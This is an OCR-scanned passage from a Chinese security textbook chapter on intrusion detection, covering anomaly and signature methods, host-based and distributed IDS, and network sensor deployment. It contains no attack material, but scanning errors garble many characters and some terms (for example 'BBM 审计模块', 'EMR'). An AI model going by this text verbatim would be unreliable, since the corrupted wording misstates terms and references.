从 本 质 上 讲 ， 异 常 检 测 方 法 试图 定义 正常 的 (或 者 称 为 预期 的 ) 行为 ， 而 基于 特征 的 检测 
方法 则 试图 定义 人 侵 特有 的 行为 。 基 于 特征 的 检测 方法 能 迅速 而 高 效 地 识别 出 已 知 的 攻击 。 然 
而 ， 只 有 异常 检测 才能 够 检测 出 未 知 的 0-day 攻击 ， 这 是 因为 它 是 用 已 知 的 正常 行为 去 识别 异 
常 行为 。 由 于 存在 这 种 优势 ， 如 果 没 有 我 们 下 面 讨论 的 收集 和 分 析 数 据 的 困难 性 ， 以 及 较 高 的 
误 报 率 ， 很 明显 异常 检测 将 是 首选 的 方法 。 


8.3.1 异常 检测 
异常 检测 方法 首先 有 一 个 训练 过 程 ， 其 通过 在 被 监控 的 系统 上 收集 和 处 理 正常 行为 的 相关 
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信息 来 建立 一 个 合法 用 户 的 行为 模型 。 训 练 过 程 可 以 在 不 同 的 时 间 进 行 ， 也 可 以 在 一 段 时 间 内 
持续 性 地 对 模型 进行 训练 使 其 演化 。 一 旦 模型 建立 并 开始 进行 检测 ， 就 会 把 当前 被 观测 到 的 行 
为 与 模型 进行 比较 ， 从 而 确定 这 是 合法 的 行为 还 是 人 侵 活动 。 

异常 检测 的 分 类 方法 很 多 ， 而 [GARC09] 提出 的 分 类 方案 如 下 : 

© 统计 法 ( statistical) : 对 被 观测 行为 的 分 析 使 用 单 因 素 、 多 因素 或 者 观察 指标 的 时 序 

模型 。 

o 基于 知识 法 (knowledge based): 使 用 专家 系统 根据 合法 行为 的 规则 集 对 被 观测 行为 进 

行 分 类 。 

o 机 器 学 习 法 ( machine-learning) : 运用 数据 挖掘 技术 ， 自 动 化 地 根据 由 训练 数据 生成 的 

模型 ， 给 被 观测 行为 确定 一 个 最 合适 的 分 类 。 

有 两 个 关键 问题 会 影响 到 这 些 方法 的 性 能 ， 分 别 是 效率 和 检测 过 程 的 开销 。 

被 监测 的 数据 首先 应 参数 化 为 预期 的 标准 的 指标 ， 这 些 指 标 随后 会 用 于 分 析 过 程 。 这 个 步 
又 确保 了 经 由 各 种 各 样 数 据 源 收集 而 来 的 数据 以 标准 的 形式 用 于 分 析 。 

统计 方法 使 用 捕获 的 传感器 数据 生成 一 个 观测 指标 的 统计 曲线 。 最 早 的 方法 是 使 用 单 变量 
模型 ， 即 每 一 个 指标 都 被 看 作 一 个 独立 的 随机 变量 。 然 而 ， 这 种 方式 实在 过 于 粗糙 以 至 于 无 法 
高 效 地 识别 出 入 侵 行 为 。 之 后 ， 考 虑 指标 之 间 关 联 的 多 变量 模型 应 运 而 生 ， 获 得 了 更 好 的 区 分 
度 。 时 序 模型 采用 顺序 和 事件 之 间 的 时 间 来 更 好 地 区 分 行为 。 这 些 统计 方法 的 优点 主要 有 相对 
简单 、 计 算 开 销 较 低 、 不 需要 关于 行为 预期 的 假设 等 。 缺 点 则 包括 选择 合适 的 指标 达到 误 报 和 
漏 报 的 平衡 十 分 困难 ， 以 及 不 是 所 有 的 行为 都 可 以 用 这 些 方法 进行 建 模 。 

基于 知识 的 方法 是 采用 规则 集 对 观测 数据 进行 分 类 。 这 些 规 则 通常 在 训练 阶段 中 手动 生 
成 ， 将 其 特征 化 并 归 人 到 特定 的 分 类 中 。 这 些 规则 可 以 采用 诸如 有 限 自 动机 、 标 准 描述 语言 等 
形式 化 工具 进行 描述 。 在 随后 的 检测 阶段 ， 它 们 被 用 来 对 观测 数据 进行 分 类 。 基 于 知识 的 方法 
的 优点 是 具有 健壮 性 和 灵活 性 ， 主 要 缺点 则 是 困难 性 、 从 数据 中 生成 高 质量 知识 的 时 间 要 求 以 
及 对 辅助 这 一 过 程 的 技术 专家 的 需求 。 

机 器 学 习 方法 是 运用 数据 挖掘 技术 ， 利 用 标记 过 的 训练 数据 自动 化 地 生成 模型 。 这 个 模型 
随后 可 以 被 用 来 持续 地 对 观测 数据 进行 分 类 ， 确 定 是 正常 数据 还 是 异常 数据 。 该 方法 的 致命 缺 
点 是 训练 过 程 通 常 需要 相当 长 的 时 间 和 相当 大 的 计算 资源 。 然 而 ,一 旦 模型 建立 完毕 ， 随 后 的 

[276] 分 析 则 通常 具有 很 高 的 效率 。 

以 下 几 种 机 器 学 习 方 法 都 曾 被 成 功 地 尝试 过 : 

e 贝 叶 斯 网 络 (Bayesian network): 编码 观测 指标 之 间 的 概率 联系 。 

e 马尔 可 夫 模 型 (Markov model): 建立 一 套 各 种 状态 间 的 转移 概率 模型 ， 这 些 状态 可 能 

也 包括 一 些 隐藏 的 、 内 联 的 状态 。 
© 神经 网 络 ( neural network): 模仿 人 类 大 脑 中 的 神经 元 和 突 触 操作 ， 对 观测 数据 进行 
分 类 。 

© 模糊 逻辑 ( fuzzy logic): 使 用 模糊 集 理论 ， 该 理论 中 推理 是 近似 的 ， 能 够 适应 不 确 

定性 。 

o 遗传 算法 (genetic algorithm): 这 是 根据 进化 生物 学 而 产生 的 技术 ， 使 用 遗传 、 突 变 、 

选择 、 重 组 等 方法 形成 分 类 规则 。 

e 聚 类 和 离 群 检测 (clustering and outlier detection): 基于 相似 性 或 者 距离 向 量 对 观测 数据 

进行 分 组 ， 将 其 归 人 不 同 的 集群 中 ， 进 而 对 随后 的 数据 进行 识别 ， 确 认 其 究竟 是 属于 
某 一 个 集群 ， 还 是 一 个 离 群 数据 。 
机 器 学 习 方 法 的 优点 是 它们 的 灵活 性 、 适 应 性 ， 以 及 抓 住 观测 指标 之 间 内 在 联系 的 能 
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力 。 它 们 的 缺点 则 是 对 有 关 可 接受 行为 假设 的 依赖 、 目 前 无 法 接受 的 误 报 率 ， 以 及 较 高 的 资源 
开销 。 

在 IDS 所 使 用 的 异常 检测 方法 中 ， 尤 其 是 机 器 学 习 方 法 ， 一 个 关键 的 限制 是 它们 通常 只 
使 用 合法 数据 进行 训练 ， 不 像 [CHAN09] 调研 的 其 他 方法 ， 同 时 使 用 合法 的 和 蜡 常 的 训练 数 
据 。 异 常 训 练 数 据 的 缺乏 限制 了 上 面 列 出 的 一 些 技术 的 效果 ， 因 为 这 些 异 常 训练 数据 可 能 有 助 
于 发 现 当 前 未 知 的 新 攻击 。 


8.3.2 ”特征 或 启发 式 检测 


特征 或 启发 式 检测 是 通过 观测 系统 中 的 事件 来 检测 人 侵 。 该 方法 是 利用 一 组 特征 模式 数据 
或 者 一 组 特征 化 的 规则 来 确定 观测 到 的 数据 究竟 是 正常 的 还 是 异常 的 。 

特征 方法 是 用 一 个 大 的 已 知 恶意 数据 模式 的 集合 去 匹配 系统 中 或 发 送 到 网 络 中 的 数据 。 特 
征集 合 需要 足够 大 ， 这 样 可 以 在 尽 可 能 减 小 误 报 率 的 同时 检测 到 最 多 的 恶意 数据 。 该 方法 被 
广泛 应 用 于 反 病 毒 产品 、 网 络 流量 扫描 代理 以 及 NIDS 中 。 它 的 优点 是 相对 较 低 的 时 间 和 资源 
开销 ， 以 及 它 的 广泛 可 用 性 。 缺 点 则 是 需要 大 量 的 精力 来 实时 识别 和 检查 新 的 恶意 软件 并 为 
它们 创建 特征 ， 以 便 系统 能 够 识别 它们 。 此 外 它 也 没有 办 法 检测 到 没有 任何 特征 可 言 的 0-day 
攻击 。 

基于 规则 的 启发 式 识别 是 采用 规则 来 识别 已 知 的 渗透 或 者 利用 已 知 漏洞 进行 的 渗透 。 规 则 
还 可 用 来 识别 可 疑 行 为 ， 即 使 该 行为 并 未 超出 已 建立 的 可 用 模式 范围 。 通 常 ， 系 统 中 使 用 的 规 
则 与 特定 的 机 器 和 操作 系统 有 关 。 开 发 这 样 的 规则 最 有 效 的 方法 是 分 析 从 Intemet 上 收集 到 的 
攻击 工具 和 脚本 。 这 些 规则 可 以 作为 由 知识 渊博 的 安全 人 员 制 定 的 规则 的 补充 。 在 后 一 种 情况 
下 ， 正 常 的 过 程 是 采访 系统 管理 员 和 安全 分 析 员 以 收集 一 套 已 知 的 渗透 场景 和 威胁 目标 系统 安 
全 的 关键 事件 。 

我 们 将 在 8.9 节 讨 论 Snort 系统 ， 这 是 一 个 基于 规则 的 NIDS 实例 ， 它 拥有 一 个 大 的 规则 
集合 用 来 检测 各 种 各 样 的 网 络 攻击 。 


8.4 基于 主机 的 入 侵 检测 


基于 主机 的 DS 向 易 受 攻击 或 敏感 的 系统 中 添加 专用 的 安全 软件 层 ， 实 例 包 括 数据 库 服 
务 器 和 管理 系统 。 基 于 主机 的 IDS 以 多 种 方式 监测 系统 上 的 活动 ， 目 的 是 检测 系统 上 的 可 疑 
行为 。 在 某 些 情况 下 ， 正 如 我 们 将 在 9.6 节 讨论 的 那样 ，IDS 可 以 在 任何 损害 发 生 之 前 阻止 攻 
击 ,但 它 的 主要 目的 还 是 检测 入侵 、 记 录 可 疑 事件 ， 并 发 送 警 报 。 

基于 主机 的 IDS 的 主要 优点 是 ， 它 可 以 检测 外 部 和 内 部 人 侵 ， 这 一 点 是 基于 网 络 的 IDS 
或 者 防火 墙 所 不 及 的 。 正 如 我 们 先前 所 言 ， 基 于 主机 的 IDS 可 以 使 用 异常 、 特 征 、 启 发 式 方 
法 来 检测 未 授权 的 行为 。 我 们 首先 介绍 一 下 用 于 HIDS 的 常见 数据 源 和 传感器 ， 然 后 继续 讨论 
异常 、 特 征 和 启发 式 方法 如 何 应 用 在 HIDS 中 ， 最 后 再 研究 分 布 式 HIDS, 


8.4.1 数据 源 和 传感器 


正如 前 面 所 提 到 的 ， 人 侵 检测 的 一 个 基本 组 件 是 用 来 收集 数据 的 传感器 。 一 些 用 户 不 间断 
的 活动 记录 必须 作为 输入 提供 给 IDS 的 分 析 组 件 。 常 见 的 数据 源 包括 : 
© 系统 调用 踪迹 ( system call trace): 由 于 Forrest{CREE13] 开创 性 的 工作 ， 进 程 在 系统 上 的 
一 系列 系统 调用 记录 被 公认 为 是 用 于 HIDS 的 首选 数据 源 。 这 种 数据 源 在 UNIX/Linux 
系统 中 更 为 有 效 ， 在 Windows 系统 中 则 存在 问题 ， 这 主要 是 由 于 DLL 的 广泛 使 用 导 
致 谁 调用 了 特定 的 系统 调用 变 得 星 涩 难 明 。 
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o Wit (日 志文 件 ) 记录 (audit(log file) record) 9: 大 多 数 现代 操作 系统 ， 包 括 会 计 软件 ， 
都 会 收集 用 户 活 动 的 相关 信息 。 这 样 做 的 优势 是 不 需要 额外 的 信息 收集 软件 ， 缺 点 则 
是 审计 记录 可 能 并 不 包括 所 需 的 信息 或 者 信息 不 会 以 一 个 便利 的 形式 给 出 ， 人 侵 者 可 
能 会 企图 操纵 这 些 记录 来 隐藏 他 们 的 活动 。 

© 文件 完整 性 校 验 和 (file integrity checksum): 检测 系统 中 人 侵 活 动 的 一 个 常见 方法 是 
定期 地 扫描 关键 文件 来 计算 其 具有 密码 学 意义 的 校 验 和 ， 看 是 否 能 得 到 一 个 预期 的 结 
果 。 通 过 与 预期 的 正常 值 相 比 对 ， 来 确定 关键 文件 的 改变 是 否 超越 了 某 个 基线 。 该 方 
法 的 缺点 是 需要 用 已 有 的 正常 文件 生成 和 保护 校 验 和 ， 以 及 监控 变化 的 文件 的 困难 性 。 
Tripwire 就 是 一 个 采用 该 方法 的 著名 系统 。 

o EMR (registry access): 考虑 到 注册 表 中 信息 的 数量 和 系统 中 想 要 访问 它 的 程 
FF, 在 Windows 系统 上 的 一 个 方法 是 监控 对 注册 表 的 访问 。 然 而 这 个 数据 源 过 于 针对 
Windows， 因 而 只 有 有 限 的 成 功 记 录 。 

传感器 从 选 定 的 数据 源 来 收集 数据 ， 从 中 过 滤 掉 不 需要 的 信息 ， 将 其 记录 为 标准 化 的 格 

式 ， 最 终 推送 到 本 地 或 者 远程 的 分 析 器 中 。 


8.4.2 异常 HIDS 


由 于 在 UNIX 和 Linux 系统 收集 合适 数据 较为 容易 ， 因 此 基于 异常 的 HIDS 主要 是 在 
UNIX 和 Linux 系统 上 实现 的 。 尽 管 一 些 早 期 的 工作 使 用 了 审计 或 财务 记录 ， 但 主要 还 是 基于 
系统 调用 踪迹 。 系 统 调用 为 应 用 程序 提供 了 一 系列 和 底层 操作 系统 交互 的 函数 ， 这 是 程序 访问 
系统 内 核 的 方法 。 因 此 它们 提供 了 进程 活动 的 详细 信息 ， 这 些 信 息 可 以 被 用 来 确定 行为 是 正常 
的 还 是 异常 的 。 表 8-2a 列 出 当前 Ubuntu Linux 系统 使 用 的 系统 调用 的 一 个 实例 。 这 些 数据 通 
常 使 用 操作 系统 钧 子 (OS hook) 来 搜集 ， 例 如 BBM 审计 模块 。 大 多 数 现代 操作 系统 都 有 收集 
这 类 信息 的 高 可 靠 方法 。 

之 后 ， 系 统 调用 记录 会 由 一 个 适当 的 决策 引擎 进行 分 析 。Forrest 等 人 基于 人 工 免 疫 系 统 提 
出 了 Sequence Time-Delay Embedding (STIDE) 方法 ， 该 方法 是 用 观测 到 的 系统 调用 踪迹 序列 
和 训练 阶段 的 序列 进行 比 对 ， 得 到 一 个 失 配 率 ， 用 此 失 配 率 来 确定 这 个 调用 序列 是 正常 的 还 是 
异常 的 。 后 续 也 有 人 采用 其 他 方案 ， 比 如 隐 马 尔 可 夫 模 型 (HMM)、 人 工 神经 网 络 (ANN)、 支 
持 向 量 机 (SVM)、 极 限 学 习 机 (ELM) 等 来 进行 这 种 分 类 。 以 上 这 些 内 容 在 [CREE13] 中 有 所 
提 到 。 

[CREE13] 还 提 到 ， 尽 管 采用 较 老 的 测试 数据 集 ， 这 些 方法 都 提供 了 95% ~ 99% HA 
检测 率 ， 同 时 低 于 5% 的 漏 报 率 ， 这 是 比较 合理 的 。 他 使 用 最 近 的 数据 和 攻击 实例 、 更 密集 的 
系统 调用 特征 抽取 高 检测 率 低 漏 报 率 的 ELM 决策 引擎 ， 对 结果 进行 了 更 新 。 在 不 久 的 将 来 ， 
这 种 方法 应 该 能 产生 更 为 高 效 的 HIDS 产品 。 

传统 上 讲 ，Windows 系统 并 没有 使 用 基于 异常 的 HIDS， 这 是 由 于 广泛 使 用 动态 链接 库 
(DLL) 造成 的 。 动 态 链接 库 作 为 进程 请 求 系统 函数 和 实际 系统 调用 接口 的 中 间 层 ， 妨 碍 了 
用 系统 调用 踪迹 来 识别 进程 行为 。 有 一 些 工作 是 使 用 审计 日 志 记 录 或 者 注册 表 文 件 更 新 信息 
作为 数据 源 ， 但 是 没有 一 种 方法 十 分 成 功 。[CREE13] 提出 了 一 种 使 用 关键 DLL 函数 调用 踪 
迹 作 为 数据 源 的 新 方法 ， 其 结果 可 以 与 Linux 上 基于 系统 调用 踪迹 的 HIDS HE., K 8-2b 
列 出 了 监控 的 关键 DLL 和 可 执行 文件 。 需 要 注意 的 是 ， 这 些 DLL 中 的 数 以 千 计 的 函数 都 被 
监控 ， 其 形式 等 价 于 表 8-2a 列 出 的 系统 调用 。 这 种 方法 的 采用 应 该 有 助 于 能 检测 0-day 攻 


O ”相对 于 人 侵 检测 而 言 ， 审 计 记 录 在 计算 机 安全 中 起 到 了 更 为 广泛 的 作用 ， 在 第 18 章 详细 讨论 了 这 一 点 。 
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击 的 高 效 Windows HIDS 的 开发 ， 而 不 像 我 们 随后 要 讨论 的 ， 当 前 基于 特征 的 或 者 启发 式 
Windows HIDS。 


表 8-2 ”被 监控 的 Linux 系统 调用 和 Windows DLL 
a) Ubuntu Linux 系统 调用 


accept, access, acct, adjtime, aiocancel, aioread, aiowait, aiowrite, alarm, async_daemon, auditsys, bind, chdir chmod, 
chown, chroot, close, connect, creat, dup, dup2, execv, execve, exit, exportfs, fchdir, fchmod, fchown, fchroot, fcntl flock, 
fork, fpathconf, fstat, fstat, fstatfs, fsync, ftime, ftruncate, getdents, getdirentries, getdomainname, getdopt, getdtablesize, 
getfh, getgid, getgroups, gethostid, gethostname, gettimer, getmsg, getpagesize, getpeername, getpgrp, getpid, getpriority, 
getrlimit, getrusage, getsockname, getsockopt, gettimeofday, getuid, gtty, ioctl, kill, killpg, link, listen, lseek, Istat, madvise, 
mctl, mincore, mkdir, mknod, mmap, mount, mount, mprotect, mpxchan, msgsys, msync, munmap, nfs_mount, nfssvc, nice, 
open, pathconf, pause, pcfs_mount, phys, pipe, poll, profil, ptrace, putmsg, quota, quotactl, read, readlink, readv, reboot, 
recv, recvfrom, recvmsg, rename, resuba, rfssys, rmdir, sbreak, sbrk, select, semsys, send, sendmsg, sendto, setdomainname, 
setdopt, setgid, setgroups, sethostid, sethostname, setitimer, setpgid, setpgrp, setpgrp, setpriority, setquota, setregid, setreuid, 
setrlimit, setsid, setsockopt, settimeofday, setuid, shmsys, shutdown, sigblock, sigpause, sigpending, sigsetmask, sigstack, 
sigsys, sigvec, socket, socketaddr, socketpair, sstk, stat, stat, statfs, stime, stty, swapon, symlink, sync, sysconf, time, times, 
truncate, umask, umount, uname, unlink, unmount, ustat, utime, utimes, vadvise, vfork, vhangup, vlimit, vpixsys, vread, 
vtimes, vtrace, vwrite, wait, wait3, wait4, write, writev 


b) 关键 Windows DLL 和 可 执行 文件 


comctl32 
kernel32 
msvcpp 
msvert 
mswsock 
ntdll 
ntoskrnl 
user32 
ws2_32 


虽然 使 用 系统 调用 踪迹 为 HIDS 提供 了 最 为 丰富 的 信息 源 ， 但 在 信息 收集 和 分 类 过 程 中 ， 
它 却 给 被 监控 系统 增加 了 一 个 中 等 强度 的 负荷 。 正 如 我 们 前 面 所 提 到 的 ， 许 多 决策 引擎 的 训练 
过 程 都 需要 非常 长 的 时 间 和 大 量 的 计算 资源 。 因 此 ， 其 他 人 也 尝试 基于 审计 踪迹 的 方法 。 然 


而 ， 这 些 方法 相 较 系统 调用 踪迹 而 言 ， 不 但 检测 率 更 低 (报告 为 80%)， 而 且 也 更 容易 受 人 侵 . 


者 操作 的 影响 。 

另外 一 个 可 以 检测 当前 进程 行为 的 方法 是 ， 检 查 被 监控 主机 上 的 重要 文件 的 改变 。 该 方法 
是 使 用 密码 学 校 验 和 来 检测 被 监控 文件 任何 超越 基线 的 改变 。 通 常 所 有 的 程序 二 进 制 文件 、 脚 
本 和 配置 文件 都 会 被 监控 ， 监 控 方 式 包 括 每 次 访问 监控 ,或 是 文件 系统 的 周期 性 扫描 。 被 广泛 
使 用 的 Tripwire 系统 就 是 基于 这 种 方法 实现 的 ， 它 可 以 用 在 包括 Linux、Mac OSX、Windows 
在 内 的 所 有 主流 操作 系统 上 。 这 种 方法 对 于 人 侵 活动 或 其 他 活动 导致 的 被 监控 文件 的 变化 十 分 
敏感 。 然 而 它 无 法 检测 运行 在 系统 上 的 进程 的 变化 。 其 他 的 困难 还 包括 决定 哪些 文件 应 该 监控 
(因为 可 操作 的 系统 中 有 数量 惊人 的 文件 会 变化 )， 访 问 每 个 已 知 正常 文件 的 拷贝 来 创建 基准 值 ， 
以 及 保护 文件 特征 数据 库 。 


8.4.3 ”特征 或 启发 式 HIDS 


基于 特征 或 启发 式 的 HIDS 也 被 广泛 使 用 ， 尤 其 常见 于 反 病 毒 程序 (AV) 中， 或 者 更 准 
确 地 说 ， 常 见于 反 恶 意 软 件 产 品 中 。 这 些 产品 在 Windows 系统 上 非常 普遍 ， 它 们 也 被 纳入 到 
防火 墙 上 的 邮件 和 Web 应 用 代理 以 及 基于 网 络 的 IDS 中 。 它 们 使 用 包含 了 在 已 知 恶意 软件 中 
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发 现 的 模式 数据 的 文件 特征 数据 库 ， 或 者 使 用 特征 化 的 已 知 恶意 行为 的 启发 式 规则 。 

这 些 产 品 在 检测 已 知 恶意 软件 方面 非常 高 效 ， 然 而 ， 它 们 没有 能 力 检测 没有 相关 特征 或 启 
发 式 规则 的 0-day 攻击 。 正 如 我 们 在 6.9 节 讨 论 的 那样 ， 它 们 在 Windows 系统 上 被 广泛 使 用 ， 
并 将 继续 成 为 入侵 者 的 攻击 目标 。 


8.4.4 分 布 式 HIDS 


传统 上 讲 ， 基 于 主机 的 IDS 重点 是 如 何 对 单机 系统 实施 有 效 的 人 侵 检 测 。 然 而 典型 的 大 
型 企业 需要 保护 由 局 域 网 或 互联 网 连接 的 分 布 式 主机 集合 的 安全 。 虽 然 可 以 在 每 个 主机 上 使 用 
单机 的 IDS 作为 防范 ， 但 在 网 络 上 IDS 之 间 的 协作 可 以 实现 更 有 效 的 防范 。 

Porras 指出 在 分 布 式 IDS 设计 中 主要 有 以 下 问题 [PORR92]: 

e 分 布 式 IDS 可 能 需要 处 理 不 同 格式 的 传感器 数据 。 在 异 构 环境 中 ,不 同 的 人 侵 检 测 系 
统 可 能 会 使 用 不 同 的 传感器 和 数据 采集 方法 。 

网 络 中 的 一 个 或 多 个 节点 负责 收集 和 分 析 网 络 中 各 系统 的 数据 。 因 此 ， 原 始 传感器 数 
据 或 汇总 数据 将 通过 网 络 传输 。 在 此 过 程 中 ， 必 须要 确保 这 些 数 据 的 完整 性 和 机 密 性 。 
确保 完整 性 是 为 了 防止 人 侵 者 通过 更 改 传输 的 审计 信息 来 掩饰 他 的 活动 。 确 保 机 密 性 
则 是 因为 传输 的 审计 信息 可 能 是 有 价值 的 。 

集中 或 非 集中 式 体系 结构 都 是 可 用 的 。 在 一 个 集中 式 体系 结构 中 ， 由 一 个 中 心 节点 采 
集 和 分 析 所 有 的 传感器 数据 。 此 结构 减轻 了 对 输入 报告 进行 关联 分 析 的 任务 ， 但 却 产 
生 了 潜在 的 瓶颈 和 单 点 故障 问题 。 在 非 集中 式 体系 结构 中 有 多 个 分 析 中 心 ， 但 它们 必 
须 互 相 协 调 自身 的 活动 和 建立 信息 交换 机 制 。 

分 布 式 IDS 一 个 很 好 的 实例 是 由 加 利 福 尼 亚 大 学 戴 维 斯 分 校 ( University of California at 
Davis) 开发 的 [HEBE92，SNAP91] ; 类 似 的 方法 被 普度 大 学 [SPAF00，BALA98] 应 用 在 一 个 
项 目 中 。 图 8-2 显示 该 系统 的 体系 结构 由 三 个 主要 组 件 组 成 : 

1. 主机 代理 模块 (host agent module): 审计 采集 模块 作为 后 台 进程 运行 在 监测 系统 上 。 其 
作用 是 收集 主机 上 与 安全 相关 事件 的 数据 并 且 将 这 些 数据 传输 到 中 央 管 理 器 。 图 8-3 展示 了 代 
理 模块 体系 结构 的 细节 。 

2. 局 域 网 监测 代理 模块 (LAN monitor agent module): 以 与 主机 代理 模块 相同 的 方式 运行 ， 
它 分 析 局 域 网 流量 并 向 中 央 管 理 器 报告 结果 。 

3. 中 央 管 理 器 模块 (central manager module) : 从 局 域 网 监控 器 和 主机 代理 进程 接收 报告 并 
分 析 这 些 报告 ， 并 对 其 进行 关联 分 析 以 检测 人 侵 。 


局 域 网 监测 器 主机 


主机 
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该 方案 被 设计 为 独立 于 任何 操作 系统 或 系统 审计 实现 。 图 8-3 给 出 了 通常 采用 的 方法 。 首 
先 ， 代 理 捕获 由 本 地 审计 采集 系统 产生 的 每 个 
审计 记录 。 通 过 过 滤 手 段 ， 保 留 那些 仅 与 安全 
相关 的 记录 ， 并 将 这 些 记录 标准 化 为 主机 审计 
记录 (Host Audit Record, HAR) 格式 。 然 后 ， 
使 用 模板 驱动 的 逻辑 模块 分 析 可 疑 的 活动 记 
录 。 最 底层 的 代理 负责 扫描 与 以 前 事件 截然 不 
同 的 事件 ， 包 括 失败 的 文件 访问 、 系 统 访 问 、 
更 改 文件 的 访问 控制 权 ; 而 较 高 层 的 代理 负责 
寻找 与 攻击 模式 相 匹配 的 事件 序列 ， 如 已 知 的 
攻击 模式 (特征 )。 最 后 ， 代 理 根 据 用 户 的 历史 
行为 习惯 查找 每 个 用 户 的 异常 行为 ， 如 执行 程 8-3 ”代理 体系 结构 图 
序数 、 访 问 文件 数 等 。 

检测 到 可 疑 的 活动 时 ， 报 警 信息 会 被 发 送 到 中 央 管 理 器 。 中 央 管 理 器 使 用 专家 系统 ， 可 以 
从 收 到 的 数据 推导 出 可 能 的 后 果 。 中 央 管 理 器 还 可 能 会 主动 要 求 单个 主机 提供 HAR 的 副本 ， 
以 将 其 与 来 自 其 他 代理 的 审计 记录 进行 关联 分 析 。 

局 域 网 监测 器 代理 也 向 中 央 管 理 器 提供 信息 。 局 域 网 监测 代理 模块 审计 主机 与 主机 之 间 的 
连接 、 使 用 的 服务 和 网 络 流 量 等 信息 ， 同 时 还 负责 搜索 重大 事件 ， 如 网 络 负载 的 突然 变化 、 与 
安全 相关 的 服务 的 使 用 以 及 可 疑 的 网 络 活动 。 

图 8-2 和 图 8-3 中 所 示 的 体系 结构 是 非常 通用 和 灵活 的 。 它 们 提供 了 建立 一 个 与 机 器 无 关 
的 检测 方法 的 基础 ， 这 个 方法 能 将 检测 系统 从 单机 扩展 到 一 个 可 以 协作 的 系统 ， 并 可 以 对 大 量 
Web 站 点 和 网 络 的 活动 进行 关联 分 析 ， 以 检测 更 多 的 可 疑 的 活动 。 
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基于 网 络 的 IDS (BI NIDS) 监控 的 是 一 个 网 络 或 多 个 相互 连接 的 网 络 上 选 定 的 位 置 的 网 
络 流量 。NIDS 实时 或 接近 于 实时 地 分 析 网 络 数据 包 ， 以 试图 发 现 人 侵 模式 。NIDS 可 以 检测 
网 络 层 、 传 输 层 或 应 用 层 协议 的 活动 。 我 们 注意 到 基于 网 络 的 IDS 与 基于 主机 的 IDS 是 不 同 
的 ，NIDS 检测 网 络 上 流向 潜在 的 易 受 攻击 的 计算 机 系统 的 数据 包 流量 ， 而 基于 主机 的 IDS 系 
统 检测 的 是 主机 上 的 用 户 和 软件 活动 。 

NIDS 通常 是 公司 或 者 大 型 企业 外 围 安全 防御 架构 的 一 部 分 。 它 们 通常 通过 监控 流量 模式 
和 数据 包 的 内 容 来 专注 于 监测 外 部 的 人 侵 企图 。 随 着 加 密 技术 的 广泛 应 用 ，NIDS 已 经 无 法 看 
到 数据 包 内 部 的 有 效 内 容 ， 这 也 妨碍 了 它们 发 挥 应 有 的 作用 。 因 此 ， 尽 管 NIDS 具有 非常 重要 
的 作用 ， 但 它们 也 仅仅 是 整套 解决 方案 的 一 环 。 典 型 的 NIDS 设备 包括 : 大 量 传感器 用 来 监控 
数据 包 流 量 、 一 个 或 多 个 服务 器 负责 NIDS 管理 功能 ， 以 及 一 个 或 多 个 管理 控制 台 提 供 人 机 
交互 的 接口 。 分 析 流 量 模式 从 而 检测 人 侵 的 工作 可 以 在 传感器 、 管 理 服务 器 或 在 二 者 上 组 合 
完成 。 
8.5.1 网 络 传感器 的 类 型 

传感器 可 以 部 署 为 两 种 模式 之 一 : 内 艇 式 和 被 动 式 。 内 时 传感器 (inline sensor) 将 被 插入 
网 络 段 ， 以 使 正在 监控 的 流量 必须 通过 传感器 。 实 现 内 舱 传 感 器 的 一 种 方法 是 使 NIDS 传感器 


与 男 一 个 网 络 设备 (如 防火 墙 或 局 域 网 交换 机 ) 进行 逻辑 组 合 。 此 方法 的 优势 是 不 需要 其 他 额 
外 的 单独 硬件 设备 ， 只 需 NIDS 传感器 软件 。 另 一 种 方法 是 使 用 独立 的 内 典 NIDS 传感器 。 使 
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行人 侵 检测 和 入 侵 防护 功能 。 

更 常用 的 是 被 动 传感器 (passive sensor)。 被 动 传感器 监控 网 络 流量 的 备份 ， 实 际 的 流量 
并 没有 通过 这 个 设备 。 从 通信 流 的 角度 来 看 ， 被 动 传感器 比 内 赂 传感器 更 有 效率 ， 因 为 它 不 会 
添加 一 个 额外 的 处 理 步 骤 ， 额 外 的 处 理 步 又 会 导致 数据 包 时 延 。 

图 8-4 给 出 了 一 种 典型 的 被 动 传感器 配 
置 示意 图 。 传 感 器 通过 一 个 直接 的 物理 分 接 
器 (tap) 连接 到 网 络 传输 介质 ， 如 光缆 。 分 接 
器 为 传感器 提供 正 由 介质 传送 的 所 有 网 络 流量 
的 一 个 副本 。 这 个 分 接 器 的 网 络 接口 卡 (NIC) 


网 络 流量 








监控 接口 (无 
IP, 混杂 模式 ) 


通常 不 配置 IP 地址 。 该 NIC 仅仅 采集 所 有 流 NIDS 
入 的 流量 ， 而 不 影响 网 络 性 能 。 传 感 器 连接 到 传感器 
网 络 的 第 二 个 NIC 具有 IP 地 址 ， 使 传感器 能 N 
与 NIDS 管理 服务 器 进行 通信 。 


另 一 个 区 别 是 传感器 可 以 监测 有 线 网 ， 也 
可 以 监测 无 线 网 。 无 线 网 络 传感器 可 以 是 内 岩 
的 ， 被 并 入 到 一 个 无 线 接 人 点 (AP)， 也 可 以 
是 被 动 无 线 流 量 检测 器 。 这 些 传 感 器 需要 收集 图 8-4 被 动 NIDS 传感器 
和 分 析 无 线 协 议 流量 ， 这 样 才能 检测 针对 这 些 来 源 : 基于 [CREM06] 
协议 的 攻击 。 针 对 协议 的 攻击 主要 包括 无 线 拒 
绝 服务 、 会 话 支持 、AP 假冒 。 仅 关注 无 线 网 络 的 NIDS 称 为 无 线 IDS (WIDS)。 无 线 传感器 可 
以 是 NIDS 的 组 成 部 分 ， 负 责 收集 无 线 和 有 线 网 络 流量 的 数据 ; 或 者 是 分 布 式 IDS 的 组 成 部 分 ， 
负责 关联 主机 传感器 和 网 络 传感器 的 数据 。 


8.5.2 NIDS 传感器 部 署 


考虑 到 大 型 企业 具有 多 个 站 点 ， 每 个 站 点 有 一 个 或 多 个 局 域 网 与 所 有 网 络 相 互 连 接 ， 即 通 
过 互联 网 或 某 些 其 他 广域网 技术 进行 连接 。 对 一 个 全 面 的 NIDS 策略 来 说 ， 在 每 个 站 点 需要 一 
个 或 多 个 传感器 。 在 单个 站 点 ， 安 全 管理 员 的 关键 作用 是 确定 传感器 的 位 置 。 

图 8-5 给 出 了 可 能 的 几 种 情况 。 一 般 来 说 ， 这 是 大 型 企业 典型 的 配置 。 所 有 Internet 流量 
都 要 经 过 保护 整个 机 构 的 外 部 防火 墙 S。 从 外 部 来 的 流量 (如 需要 访问 诸如 Web 和 邮件 等 公共 
